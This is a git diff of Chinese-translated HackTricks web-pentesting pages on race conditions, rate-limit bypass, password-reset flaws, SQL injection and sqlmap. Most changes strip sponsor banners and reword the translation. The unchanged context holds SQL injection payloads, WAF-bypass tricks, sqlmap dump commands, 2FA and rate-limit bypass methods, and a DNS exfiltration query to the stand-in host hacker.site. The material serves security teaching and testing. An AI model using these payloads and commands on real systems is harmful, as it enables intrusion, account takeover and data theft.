+因此,**注册一个账户并发送多个带有空令牌** (`token=` 或 `token[]=` 或任何其他变体) 的请求以立即确认账户,可能允许 **确认一个你无法控制电子邮件的账户**。
 
 **查看这个** [**PortSwigger Lab**](https://portswigger.net/web-security/race-conditions/lab-race-conditions-partial-construction) **进行尝试。**
 
 ### 绕过 2FA
 
-以下伪代码容易受到竞争条件的影响,因为在创建会话的非常短时间内,**2FA 并未强制执行**:
+以下伪代码容易受到竞争条件的影响,因为在创建会话的非常短时间内 **2FA 并未强制执行**:
 ```python
 session['userid'] = user.userid
 if user.mfa_enabled:
@@ -365,12 +357,12 @@ session['enforce_mfa'] = True
 ```
 ### OAuth2 永久持久性
 
-有几个 [**OAUth 提供者**](https://en.wikipedia.org/wiki/List_of_OAuth_providers)。这些服务允许您创建一个应用程序并验证提供者注册的用户。为此,**客户端**需要**允许您的应用程序**访问其在**OAUth 提供者**中的某些数据。\
+有几个 [**OAUth 提供者**](https://en.wikipedia.org/wiki/List_of_OAuth_providers)。这些服务允许您创建一个应用程序并验证提供者已注册的用户。为此,**客户端**需要**允许您的应用程序**访问其在**OAUth 提供者**中的某些数据。\
 到此为止,只是一个常见的使用 google/linkedin/github 等的登录,您会看到一个页面提示:“_应用程序 \ 想要访问您的信息,您想允许吗?_”
 
 #### `authorization_code` 中的竞争条件
 
-**问题**出现在您**接受**它时,并自动将**`authorization_code`**发送到恶意应用程序。然后,这个**应用程序利用 OAUth 服务提供者中的竞争条件生成多个 AT/RT**(_身份验证令牌/刷新令牌_)用于您的帐户。基本上,它将利用您已接受该应用程序访问您的数据的事实来**创建多个帐户**。然后,如果您**停止允许该应用程序访问您的数据,一对 AT/RT 将被删除,但其他的仍然有效**。
+**问题**出现在您**接受**它并自动将**`authorization_code`**发送到恶意应用程序时。然后,这个**应用程序利用 OAUth 服务提供者中的竞争条件从您的账户的**`authorization_code`**生成多个 AT/RT**(_身份验证令牌/刷新令牌_)。基本上,它将利用您已接受该应用程序访问您的数据的事实来**创建多个账户**。然后,如果您**停止允许该应用程序访问您的数据,一对 AT/RT 将被删除,但其他的仍然有效**。
 
 #### `Refresh Token` 中的竞争条件
 
@@ -378,7 +370,7 @@ session['enforce_mfa'] = True
 
 ## **WebSockets 中的 RC**
 
-在 [**WS_RaceCondition_PoC**](https://github.com/redrays-io/WS_RaceCondition_PoC) 中,您可以找到一个 Java 的 PoC,用于并行发送 websocket 消息以利用**Web Sockets 中的竞争条件**。
+在 [**WS_RaceCondition_PoC**](https://github.com/redrays-io/WS_RaceCondition_PoC) 中,您可以找到一个 Java 的 PoC,用于并行发送 websocket 消息以滥用**Web Sockets 中的竞争条件**。
 
 ## 参考文献
 
@@ -390,11 +382,3 @@ session['enforce_mfa'] = True
 - [https://flatt.tech/research/posts/beyond-the-limit-expanding-single-packet-race-condition-with-first-sequence-sync/](https://flatt.tech/research/posts/beyond-the-limit-expanding-single-packet-race-condition-with-first-sequence-sync/)
 
 {{#include ../banners/hacktricks-training.md}}
-
-

-
-\
-使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=race-condition) 轻松构建和**自动化工作流**,由世界上**最先进**的社区工具提供支持。\
-今天就获取访问权限: 
-
-{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=race-condition" %}
diff --git a/src/pentesting-web/rate-limit-bypass.md b/src/pentesting-web/rate-limit-bypass.md
index 4ae6a7695..54dc6da63 100644
--- a/src/pentesting-web/rate-limit-bypass.md
+++ b/src/pentesting-web/rate-limit-bypass.md
@@ -1,13 +1,5 @@
 # Rate Limit Bypass
 
-

-
-\
-使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=rate-limit-bypass) 轻松构建和 **自动化工作流**,由世界上 **最先进** 的社区工具提供支持。\
-立即获取访问权限:
-
-{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=rate-limit-bypass" %}
-
 {{#include ../banners/hacktricks-training.md}}
 
 ## Rate limit bypass techniques
@@ -18,7 +10,7 @@
 
 ### Incorporating Blank Characters in Code or Parameters
 
-在代码或参数中插入空字节,如 `%00`、`%0d%0a`、`%0d`、`%0a`、`%09`、`%0C`、`%20`,可以是一种有用的策略。例如,将参数调整为 `code=1234%0a` 允许通过输入的变体扩展尝试,例如在电子邮件地址中添加换行符以绕过尝试限制。
+在代码或参数中插入空字节,如 `%00`、`%0d%0a`、`%0d`、`%0a`、`%09`、`%0C`、`%20` 可以是一种有效策略。例如,将参数调整为 `code=1234%0a` 允许通过输入的变体扩展尝试,例如在电子邮件地址中添加换行符以绕过尝试限制。
 
 ### Manipulating IP Origin via Headers
 
@@ -50,7 +42,7 @@ X-Forwarded-For: 127.0.0.1
 
 ### 利用代理网络
 
-部署一个代理网络,将请求分散到多个 IP 地址,可以有效绕过基于 IP 的速率限制。通过通过各种代理路由流量,每个请求看起来都来自不同的来源,从而稀释速率限制的有效性。
+部署一个代理网络,将请求分散到多个 IP 地址,可以有效绕过基于 IP 的速率限制。通过各种代理路由流量,每个请求看起来都来自不同的来源,从而稀释速率限制的有效性。
 
 ### 在不同帐户或会话之间分散攻击
 
@@ -61,11 +53,3 @@ X-Forwarded-For: 127.0.0.1
 请注意,即使存在速率限制,您也应该尝试查看在发送有效 OTP 时响应是否不同。在 [**这篇文章**](https://mokhansec.medium.com/the-2-200-ato-most-bug-hunters-overlooked-by-closing-intruder-too-soon-505f21d56732) 中,漏洞猎人发现,即使在 20 次不成功的尝试后触发了速率限制并以 401 响应,如果发送了有效的 OTP,则会收到 200 响应。
 
 {{#include ../banners/hacktricks-training.md}}
-
-

-
-\
-使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=rate-limit-bypass) 轻松构建和 **自动化工作流**,由世界上 **最先进** 的社区工具提供支持。\
-今天就获取访问权限:
-
-{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=rate-limit-bypass" %}
diff --git a/src/pentesting-web/reset-password.md b/src/pentesting-web/reset-password.md
index d71a99a26..578589210 100644
--- a/src/pentesting-web/reset-password.md
+++ b/src/pentesting-web/reset-password.md
@@ -2,22 +2,7 @@
 
 {{#include ../banners/hacktricks-training.md}}
 
-

-
-加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和漏洞赏金猎人交流!
-
-**黑客见解**\
-参与深入探讨黑客的刺激与挑战的内容
-
-**实时黑客新闻**\
-通过实时新闻和见解,跟上快速变化的黑客世界
-
-**最新公告**\
-了解最新的漏洞赏金发布和重要平台更新
-
-**加入我们** [**Discord**](https://discord.com/invite/N3FrSbmwdy),今天就开始与顶级黑客合作!
-
-## **通过引荐人泄露密码重置令牌**
+## **通过引荐者泄露密码重置令牌**
 
 - 如果密码重置令牌包含在URL中,HTTP referer头可能会泄露该令牌。这可能发生在用户请求密码重置后点击第三方网站链接时。
 - **影响**:通过跨站请求伪造(CSRF)攻击可能导致账户接管。
@@ -34,7 +19,7 @@
 - **缓解步骤**:
 - 验证Host头是否在允许的域名白名单中。
 - 使用安全的服务器端方法生成绝对URL。
-- **补丁**:使用 `$_SERVER['SERVER_NAME']` 构造密码重置URL,而不是 `$_SERVER['HTTP_HOST']`。
+- **补丁**:使用`$_SERVER['SERVER_NAME']`构造密码重置URL,而不是`$_SERVER['HTTP_HOST']`。
 - **参考**:
 - [关于密码重置中毒的Acunetix文章](https://www.acunetix.com/blog/articles/password-reset-poisoning/)
 
@@ -42,7 +27,7 @@
 
 攻击者可以通过添加额外的电子邮件参数来操纵密码重置请求,以转移重置链接。
 
-- 使用 & 添加攻击者电子邮件作为第二个参数
+- 使用&将攻击者电子邮件作为第二个参数添加
 ```php
 POST /resetPassword
 [...]
@@ -138,7 +123,7 @@ uuid-insecurities.md
 {{#endref}}
 
 - **缓解步骤**:
-- 使用GUID版本4以确保随机性,或对其他版本实施额外的安全措施。
+- 对于随机性使用GUID版本4,或对其他版本实施额外的安全措施。
 - **工具**:使用[guidtool](https://github.com/intruder-io/guidtool)分析和生成GUID。
 
 ## **响应操纵:用好响应替换坏响应**
@@ -161,7 +146,7 @@ uuid-insecurities.md
 - 尝试使用Burpsuite和IP-Rotator等工具暴力破解重置令牌,以绕过基于IP的速率限制。
 - **缓解步骤**:
 - 实施强大的速率限制和账户锁定机制。
-- 监控可疑活动,以指示暴力破解攻击。
+- 监控可疑活动,以指示暴力攻击。
 
 ## **尝试使用您的令牌**
 
@@ -185,19 +170,4 @@ uuid-insecurities.md
 
 - [https://anugrahsr.github.io/posts/10-Password-reset-flaws/#10-try-using-your-token](https://anugrahsr.github.io/posts/10-Password-reset-flaws/#10-try-using-your-token)
 
-

-
-加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和漏洞赏金猎人交流!
-
-**黑客洞察**\
-参与深入探讨黑客的刺激与挑战的内容
-
-**实时黑客新闻**\
-通过实时新闻和见解,跟上快速变化的黑客世界
-
-**最新公告**\
-及时了解最新的漏洞赏金发布和重要平台更新
-
-**加入我们** [**Discord**](https://discord.com/invite/N3FrSbmwdy),今天就开始与顶级黑客合作!
-
 {{#include ../banners/hacktricks-training.md}}
diff --git a/src/pentesting-web/sql-injection/README.md b/src/pentesting-web/sql-injection/README.md
index 7f36e5603..ca6369e3b 100644
--- a/src/pentesting-web/sql-injection/README.md
+++ b/src/pentesting-web/sql-injection/README.md
@@ -2,19 +2,14 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-

-
-​​​​[**RootedCON**](https://www.rootedcon.com/) 是 **西班牙** 最相关的网络安全事件,也是 **欧洲** 最重要的事件之一。该大会的 **使命是促进技术知识**,是各个领域技术和网络安全专业人士的热烈交流平台。
-
-{% embed url="https://www.rootedcon.com/" %}
 
 ## 什么是 SQL 注入?
 
-**SQL 注入** 是一种安全漏洞,允许攻击者 **干扰应用程序的数据库查询**。此漏洞使攻击者能够 **查看**、**修改** 或 **删除** 他们不应访问的数据,包括其他用户的信息或应用程序可以访问的任何数据。这些行为可能导致应用程序功能或内容的永久性更改,甚至可能导致服务器的泄露或拒绝服务。
+**SQL 注入**是一种安全漏洞,允许攻击者**干扰应用程序的数据库查询**。此漏洞使攻击者能够**查看**、**修改**或**删除**他们不应访问的数据,包括其他用户的信息或应用程序可以访问的任何数据。这些行为可能导致应用程序功能或内容的永久性更改,甚至可能导致服务器的泄露或服务拒绝。
 
 ## 入口点检测
 
-当一个网站由于对与 SQLi 相关的输入的异常服务器响应而 **看似易受 SQL 注入 (SQLi)** 攻击时,**第一步** 是了解如何 **在不干扰查询的情况下注入数据**。这需要有效识别 **逃离当前上下文** 的方法。以下是一些有用的示例:
+当一个网站由于对与 SQLi 相关的输入的异常服务器响应而显得**易受 SQL 注入 (SQLi)**攻击时,**第一步**是了解如何**在不干扰查询的情况下注入数据**。这需要有效识别**从当前上下文中逃逸**的方法。以下是一些有用的示例:
 ```
 [Nothing]
 '
@@ -29,7 +24,7 @@
 ```
 然后,您需要知道如何**修复查询以避免错误**。为了修复查询,您可以**输入**数据,以便**先前的查询接受新数据**,或者您可以直接**输入**您的数据并**在末尾添加注释符号**。
 
-_请注意,如果您能看到错误消息或在查询正常工作与不正常工作时能发现差异,这个阶段将会更容易。_
+_请注意,如果您能看到错误消息或能够发现查询正常工作与不正常工作时的差异,这个阶段将会更容易。_
 
 ### **注释**
 ```sql
@@ -134,7 +129,7 @@ SQLite
 此外,如果您可以访问查询的输出,您可以使其**打印数据库的版本**。
 
 > [!NOTE]
-> 接下来,我们将讨论利用不同类型的SQL注入的不同方法。我们将以MySQL为例。
+> 接下来我们将讨论不同的方法来利用不同类型的SQL注入。我们将以MySQL为例。
 
 ### 使用PortSwigger进行识别
 
@@ -168,7 +163,7 @@ SQLite
 ```
 #### UNION SELECT
 
-选择越来越多的空值,直到查询正确:
+选择更多的空值,直到查询正确:
 ```sql
 1' UNION SELECT null-- - Not working
 1' UNION SELECT null,null-- - Not working
@@ -210,7 +205,7 @@ _在每个不同的数据库中发现这些数据的方法各不相同,但方
 ```
 ## 利用盲注
 
-在这种情况下,您无法看到查询的结果或错误,但您可以**区分**查询何时**返回**一个**真**或**假**的响应,因为页面上的内容不同。\
+在这种情况下,您无法看到查询的结果或错误,但您可以**区分**查询何时**返回****真**或**假**响应,因为页面上的内容不同。\
 在这种情况下,您可以利用这种行为逐字符地转储数据库:
 ```sql
 ?id=1 AND SELECT SUBSTR(table_name,1,1) FROM information_schema.tables = 'A'
@@ -227,15 +222,15 @@ AND (SELECT IF(1,(SELECT table_name FROM information_schema.tables),'a'))-- -
 ```sql
 1 and (select sleep(10) from users where SUBSTR(table_name,1,1) = 'A')#
 ```
-## 堆叠查询
+## Stacked Queries
 
 您可以使用堆叠查询来**连续执行多个查询**。请注意,尽管后续查询会被执行,但**结果**不会**返回给应用程序**。因此,这种技术主要用于与**盲漏洞**相关的情况,在这种情况下,您可以使用第二个查询触发DNS查找、条件错误或时间延迟。
 
-**Oracle** 不支持 **堆叠查询**。**MySQL、Microsoft** 和 **PostgreSQL** 支持它们:`QUERY-1-HERE; QUERY-2-HERE`
+**Oracle**不支持**堆叠查询**。**MySQL、Microsoft**和**PostgreSQL**支持它们:`QUERY-1-HERE; QUERY-2-HERE`
 
-## 脱带利用
+## Out of band Exploitation
 
-如果**没有其他**利用方法**有效**,您可以尝试让**数据库将信息外泄**到您控制的**外部主机**。例如,通过DNS查询:
+如果**没有其他**利用方法**有效**,您可以尝试使**数据库将信息外泄**到您控制的**外部主机**。例如,通过DNS查询:
 ```sql
 select load_file(concat('\\\\',version(),'.hacker.site\\a.txt'));
 ```
@@ -257,13 +252,8 @@ a' UNION SELECT EXTRACTVALUE(xmltype('

-
-​​​​​[**RootedCON**](https://www.rootedcon.com/) 是 **西班牙** 最相关的网络安全事件,也是 **欧洲** 最重要的事件之一。该大会 **旨在促进技术知识**,是各个学科的技术和网络安全专业人士的一个热烈交流点。
-
-{% embed url="https://www.rootedcon.com/" %}
 
 ## 认证绕过
 
@@ -277,7 +267,7 @@ a' UNION SELECT EXTRACTVALUE(xmltype('

-
-​​​​​​[**RootedCON**](https://www.rootedcon.com/) 是 **西班牙** 最相关的网络安全事件,也是 **欧洲** 最重要的活动之一。 该大会 **旨在促进技术知识**,是各个学科技术和网络安全专业人士的热烈交流平台。
-
-{% embed url="https://www.rootedcon.com/" %}
-
 ## Routed SQL injection
 
-Routed SQL injection 是一种情况,其中可注入查询不是产生输出的查询,而是可注入查询的输出传递给产生输出的查询。 ([来自论文](http://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20Routed%20SQL%20Injection%20-%20Zenodermus%20Javanicus.txt))
+Routed SQL injection 是一种情况,其中可注入的查询不是产生输出的查询,而是可注入查询的输出传递给产生输出的查询。 ([From Paper](http://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20Routed%20SQL%20Injection%20-%20Zenodermus%20Javanicus.txt))
 
-示例:
+Example:
 ```
 #Hex of: -1' union select login,password from users-- a
 -1' union select 0x2d312720756e696f6e2073656c656374206c6f67696e2c70617373776f72642066726f6d2075736572732d2d2061 -- a
@@ -409,7 +393,7 @@ Routed SQL injection 是一种情况,其中可注入查询不是产生输出
 
 ### 无空格绕过
 
-无空格 (%20) - 使用空白替代品进行绕过
+无空格 (%20) - 使用空白替代品绕过
 ```sql
 ?id=1%09and%091=1%09--
 ?id=1%0Dand%0D1=1%0D--
@@ -489,11 +473,4 @@ WHERE -> HAVING --> LIMIT X,1 -> group_concat(CASE(table_schema)When(database())
 {% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/sqli.txt" %}
 
 ​
-
-

-
-​​​​​​​[**RootedCON**](https://www.rootedcon.com/) 是 **西班牙** 最相关的网络安全事件,也是 **欧洲** 最重要的事件之一。这个大会的 **使命是促进技术知识**,是各个学科技术和网络安全专业人士的一个热烈交流点。
-
-{% embed url="https://www.rootedcon.com/" %}
-
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-web/sql-injection/mysql-injection/README.md b/src/pentesting-web/sql-injection/mysql-injection/README.md
index 5eaf912e3..0667e1568 100644
--- a/src/pentesting-web/sql-injection/mysql-injection/README.md
+++ b/src/pentesting-web/sql-injection/mysql-injection/README.md
@@ -2,13 +2,9 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-

 
-​​[**RootedCON**](https://www.rootedcon.com/) 是 **西班牙** 最相关的网络安全事件,也是 **欧洲** 最重要的活动之一。该大会 **旨在促进技术知识**,是各个学科技术和网络安全专业人士的热烈交流平台。
 
-{% embed url="https://www.rootedcon.com/" %}
-
-## 评论
+## 注释
 ```sql
 -- MYSQL Comment
 # MYSQL Comment
@@ -18,7 +14,7 @@
 ```
 ## 有趣的函数
 
-### 确认 Mysql:
+### 确认 Mysql:
 ```
 concat('a','b')
 database()
@@ -103,13 +99,13 @@ UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,data,0x7C)+fRoM+...
 ```
 ## SSRF
 
-**在这里了解不同的选项以** [**滥用 Mysql 注入来获取 SSRF**](mysql-ssrf.md)**。**
+**在这里了解不同的选项以** [**滥用Mysql注入来获得SSRF**](mysql-ssrf.md)**。**
 
-## WAF 绕过技巧
+## WAF绕过技巧
 
 ### 通过预处理语句执行查询
 
-当允许堆叠查询时,可以通过将要执行的查询的十六进制表示分配给变量(使用 SET),然后使用 PREPARE 和 EXECUTE MySQL 语句最终执行查询,从而绕过 WAF。类似于这样:
+当允许堆叠查询时,可以通过将要执行的查询的十六进制表示分配给变量(使用SET),然后使用PREPARE和EXECUTE MySQL语句最终执行查询,从而绕过WAF。类似于这样:
 ```
 0); SET @query = 0x53454c45435420534c454550283129; PREPARE stmt FROM @query; EXECUTE stmt; #
 ```
@@ -119,7 +115,7 @@ UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,data,0x7C)+fRoM+...
 
 请记住,在 **MySQL** 的“现代”版本中,您可以将 _**information_schema.tables**_ 替换为 _**mysql.innodb_table_stats**_ 或 _**sys.x$schema_flattened_keys**_ 或 **sys.schema_table_statistics**
 
-### MySQL 注入无逗号
+### MySQL 注入没有逗号
 
 选择 2 列而不使用任何逗号 ([https://security.stackexchange.com/questions/118332/how-make-sql-select-query-without-comma](https://security.stackexchange.com/questions/118332/how-make-sql-select-query-without-comma)):
 ```
@@ -138,7 +134,7 @@ select (select "", "", "") < (SELECT * from demo limit 1); # 3columns
 # When True, you found the correct char and can start ruteforcing the next position
 select (select 1, 'flaf') = (SELECT * from demo limit 1);
 ```
-更多信息请见 [https://medium.com/@terjanq/blind-sql-injection-without-an-in-1e14ba1d4952](https://medium.com/@terjanq/blind-sql-injection-without-an-in-1e14ba1d4952)
+更多信息请访问 [https://medium.com/@terjanq/blind-sql-injection-without-an-in-1e14ba1d4952](https://medium.com/@terjanq/blind-sql-injection-without-an-in-1e14ba1d4952)
 
 ### MySQL 历史
 
@@ -158,10 +154,5 @@ mysql> select version();
 
 - [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MySQL%20Injection.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MySQL%20Injection.md)
 
-

-
-​​​​[**RootedCON**](https://www.rootedcon.com/) 是 **西班牙** 最相关的网络安全事件,也是 **欧洲** 最重要的活动之一。该大会 **旨在促进技术知识**,是各个学科技术和网络安全专业人士的热烈交流平台。
-
-{% embed url="https://www.rootedcon.com/" %}
 
 {{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-web/sql-injection/postgresql-injection/README.md b/src/pentesting-web/sql-injection/postgresql-injection/README.md
index 2b20ea157..50ead8bfb 100644
--- a/src/pentesting-web/sql-injection/postgresql-injection/README.md
+++ b/src/pentesting-web/sql-injection/postgresql-injection/README.md
@@ -2,27 +2,21 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-

-
-如果你对 **黑客职业** 感兴趣并想要攻克不可攻克的目标 - **我们正在招聘!** (_需要流利的波兰语书写和口语能力_).
-
-{% embed url="https://www.stmcyber.com/careers" %}
-
 ---
 
-**本页面旨在解释不同的技巧,这些技巧可以帮助你利用在 PostgreSQL 数据库中发现的 SQL 注入,并补充你可以在** [**https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md**](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md) **上找到的技巧。**
+**本页面旨在解释不同的技巧,这些技巧可以帮助您利用在 PostgreSQL 数据库中发现的 SQL 注入,并补充您可以在** [**https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md**](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md) **找到的技巧。**
 
-## 网络交互 - 权限提升、端口扫描、NTLM 挑战响应泄露与数据外泄
+## 网络交互 - 权限提升、端口扫描、NTLM 挑战响应泄露与外泄
 
 **PostgreSQL 模块 `dblink`** 提供了连接到其他 PostgreSQL 实例和执行 TCP 连接的能力。这些功能与 `COPY FROM` 功能相结合,使得权限提升、端口扫描和 NTLM 挑战响应捕获等操作成为可能。有关执行这些攻击的详细方法,请查看如何 [执行这些攻击](network-privesc-port-scanner-and-ntlm-chanllenge-response-disclosure.md)。
 
-### **使用 dblink 和大对象的数据外泄示例**
+### **使用 dblink 和大对象的外泄示例**
 
-你可以 [**阅读这个示例**](dblink-lo_import-data-exfiltration.md) 来查看一个 CTF 示例,**如何将数据加载到大对象中,然后在函数 `dblink_connect` 的用户名中外泄大对象的内容。**
+您可以 [**阅读此示例**](dblink-lo_import-data-exfiltration.md) 以查看一个 CTF 示例,**如何将数据加载到大对象中,然后在函数 `dblink_connect` 的用户名中外泄大对象的内容。**
 
 ## PostgreSQL 攻击:读/写、RCE、权限提升
 
-查看如何从 PostgreSQL 破坏主机并提升权限:
+请查看如何从 PostgreSQL 破坏主机并提升权限:
 
 {{#ref}}
 ../../../network-services-pentesting/pentesting-postgresql.md
@@ -32,12 +26,12 @@
 
 ### PostgreSQL 字符串函数
 
-操纵字符串可以帮助你 **绕过 WAF 或其他限制**。\
-[**在此页面**](https://www.postgresqltutorial.com/postgresql-string-functions/)**你可以找到一些有用的字符串函数。**
+操纵字符串可以帮助您 **绕过 WAF 或其他限制**。\
+[**在此页面**](https://www.postgresqltutorial.com/postgresql-string-functions/) **您可以找到一些有用的字符串函数。**
 
 ### 堆叠查询
 
-请记住,PostgreSQL 支持堆叠查询,但如果在期望仅返回 1 个响应时返回 2 个响应,许多应用程序会抛出错误。但是,你仍然可以通过时间注入滥用堆叠查询:
+请记住,PostgreSQL 支持堆叠查询,但如果在期望仅返回 1 个响应时返回 2 个响应,许多应用程序将抛出错误。但是,您仍然可以通过时间注入滥用堆叠查询:
 ```
 id=1; select pg_sleep(10);-- -
 1; SELECT case when (SELECT current_setting('is_superuser'))='on' then pg_sleep(10) end;-- -
@@ -56,9 +50,9 @@ SELECT query_to_xml('select * from pg_user',true,true,'');
 ```sql
 SELECT database_to_xml(true,true,'');
 ```
-### 字符串以十六进制表示
+### Hex中的字符串
 
-如果您可以运行 **查询** 并将其 **放在字符串中**(例如使用 **`query_to_xml`** 函数)。 **您可以使用 convert_from 将字符串作为十六进制传递,从而以这种方式绕过过滤器:**
+如果您可以运行**查询**并将其**放在字符串中**(例如使用**`query_to_xml`**函数)。**您可以使用convert_from将字符串作为十六进制传递,从而以这种方式绕过过滤器:**
 ```sql
 select encode('select cast(string_agg(table_name, '','') as int) from information_schema.tables', 'hex'), convert_from('\x73656c656374206361737428737472696e675f616767287461626c655f6e616d652c20272c272920617320696e74292066726f6d20696e666f726d6174696f6e5f736368656d612e7461626c6573', 'UTF8');
 
@@ -80,10 +74,4 @@ SELECT 'hacktricks';
 SELECT $$hacktricks$$;
 SELECT $TAG$hacktricks$TAG$;
 ```
-

-
-如果你对**黑客职业**感兴趣并想要攻克不可攻克的目标 - **我们正在招聘!** (_需要流利的波兰语书写和口语能力_)。
-
-{% embed url="https://www.stmcyber.com/careers" %}
-
 {{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-web/sql-injection/sqlmap/README.md b/src/pentesting-web/sql-injection/sqlmap/README.md
index 434533f37..efbb148d9 100644
--- a/src/pentesting-web/sql-injection/sqlmap/README.md
+++ b/src/pentesting-web/sql-injection/sqlmap/README.md
@@ -2,13 +2,6 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-

-
-**从黑客的角度审视您的网络应用、网络和云**
-
-**查找并报告具有实际业务影响的关键可利用漏洞。** 使用我们20多个自定义工具来映射攻击面,发现让您提升权限的安全问题,并使用自动化漏洞利用收集重要证据,将您的辛勤工作转化为有说服力的报告。
-
-{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
 
 ## SQLmap的基本参数
 
@@ -50,13 +43,13 @@
 --columns #Columns of a table  ( -D  -T  )
 -D  -T 
 -C  #Dump column
 ```
-使用 [SQLMapping](https://taurusomar.github.io/sqlmapping/) 是一个实用工具,可以生成命令并提供 SQLMap 的完整概述,包括基本和高级功能。它包括工具提示,解释工具的每个方面,详细说明每个选项,以便您可以提高并理解如何有效和高效地使用它。
+使用 [SQLMapping](https://taurusomar.github.io/sqlmapping/) 是一个实用工具,可以生成命令并提供 SQLMap 的完整概述,包括基本和高级功能。它包括 ToolTips,解释工具的每个方面,详细说明每个选项,以便您可以提高并理解如何有效和高效地使用它。
 
 ## 注入位置
 
-### 从 Burp/ZAP 捕获
+### 来自 Burp/ZAP 捕获
 
-捕获请求并创建 req.txt 文件
+捕获请求并创建一个 req.txt 文件
 ```bash
 sqlmap -r req.txt --current-user
 ```
@@ -89,7 +82,7 @@ sqlmap --method=PUT -u "http://example.com" --headers="referer:*"
 ```
 ### Eval
 
-**Sqlmap** 允许使用 `-e` 或 `--eval` 在发送之前处理每个有效负载,使用一些 python 单行代码。这使得在发送之前以自定义方式处理有效负载变得非常简单和快速。在以下示例中,**flask cookie session** **在发送之前由 flask 使用已知的密钥进行签名**:
+**Sqlmap** 允许使用 `-e` 或 `--eval` 在发送之前处理每个有效负载,使用一些 python 一行代码。这使得在发送之前以自定义方式处理有效负载变得非常简单和快速。在以下示例中,**flask cookie session** **在发送之前由 flask 使用已知的密钥进行签名**:
 ```bash
 sqlmap http://1.1.1.1/sqli --eval "from flask_unsign import session as s; session = s.sign({'uid': session}, secret='SecretExfilratedFromTheMachine')" --cookie="session=*" --dump
 ```
@@ -140,7 +133,7 @@ sqlmap -r r.txt -p id --not-string ridiculous --batch
 ```
 ### Tamper
 
-记住,**你可以用 Python 创建自己的 tamper**,这非常简单。你可以在[第二次注入页面这里](second-order-injection-sqlmap.md)找到一个 tamper 示例。
+请记住,**您可以在 Python 中创建自己的 tamper**,这非常简单。您可以在[第二次注入页面这里](second-order-injection-sqlmap.md)找到一个 tamper 示例。
 ```bash
 --tamper=name_of_the_tamper
 #In kali you can see all the tampers in /usr/share/sqlmap/tamper
@@ -158,8 +151,8 @@ sqlmap -r r.txt -p id --not-string ridiculous --batch
 | commalessmid.py              | 用 'MID(A FROM B FOR C)' 替换类似 'MID(A, B, C)' 的实例                                                                          |
 | concat2concatws.py           | 用 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)' 替换类似 'CONCAT(A, B)' 的实例                                                          |
 | charencode.py                | 对给定有效负载中的所有字符进行 URL 编码(不处理已编码的字符)                                                                     |
-| charunicodeencode.py         | 对给定有效负载中未编码的字符进行 Unicode URL 编码(不处理已编码的字符)。"%u0022"                                               |
-| charunicodeescape.py         | 对给定有效负载中未编码的字符进行 Unicode URL 编码(不处理已编码的字符)。"\u0022"                                               |
+| charunicodeencode.py         | 对给定有效负载中未编码的字符进行 Unicode-url 编码(不处理已编码的字符)。 "%u0022"                                               |
+| charunicodeescape.py         | 对给定有效负载中未编码的字符进行 Unicode-url 编码(不处理已编码的字符)。 "\u0022"                                               |
 | equaltolike.py               | 用运算符 'LIKE' 替换所有等于运算符 ('=') 的出现                                                                                   |
 | escapequotes.py              | 斜杠转义引号 (' 和 ")                                                                                                            |
 | greatest.py                  | 用 'GREATEST' 对应字符替换大于运算符 ('>')                                                                                        |
@@ -168,7 +161,7 @@ sqlmap -r r.txt -p id --not-string ridiculous --batch
 | modsecurityversioned.py      | 用版本化注释包裹完整查询                                                                                                          |
 | modsecurityzeroversioned.py  | 用零版本化注释包裹完整查询                                                                                                        |
 | multiplespaces.py            | 在 SQL 关键字周围添加多个空格                                                                                                     |
-| nonrecursivereplacement.py   | 用适合替换的表示法替换预定义的 SQL 关键字(例如 .replace("SELECT", "")过滤器                                                  |
+| nonrecursivereplacement.py   | 用适合替换的表示法替换预定义的 SQL 关键字(例如 .replace("SELECT", "")过滤器)                                                  |
 | percentage.py                | 在每个字符前添加百分号 ('%')                                                                                                     |
 | overlongutf8.py              | 转换给定有效负载中的所有字符(不处理已编码的字符)                                                                                |
 | randomcase.py                | 用随机大小写值替换每个关键字字符                                                                                                   |
@@ -185,7 +178,7 @@ sqlmap -r r.txt -p id --not-string ridiculous --batch
 | space2mysqldash.py           | 用破折号注释 ('--') 替换空格字符 (' '),后跟换行符 ('\n')                                                                        |
 | space2plus.py                | 用加号 ('+') 替换空格字符 (' ')                                                                                                   |
 | space2randomblank.py         | 用有效替代字符集中的随机空白字符替换空格字符 (' ')                                                                                |
